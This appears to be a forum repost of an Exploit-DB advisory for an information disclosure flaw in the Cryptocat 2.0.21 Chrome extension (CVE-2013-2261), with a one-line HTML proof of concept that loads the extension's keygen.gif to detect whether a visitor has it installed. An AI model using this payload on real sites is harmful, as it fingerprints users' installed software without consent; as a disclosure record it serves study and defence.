Exploit Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
38636
Проверка EDB
  1. Пройдено
Автор
MARIO HEIDERICH
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
cve-2013-2261
Дата публикации
2012-11-07
Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure
Код:
source: https://www.securityfocus.com/bid/61090/info

Cryptocat is prone to an information disclosure vulnerability.

An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks.

Cryptocat 2.0.21 is vulnerable; other versions may also be affected. 

<img src="chrome-extension://[extension-id-from-chrome-web-
store]/img/keygen.gif" onload=alert(/hascat/) onerror=alert(/hasnot/) >
 
Источник
www.exploit-db.com

Похожие темы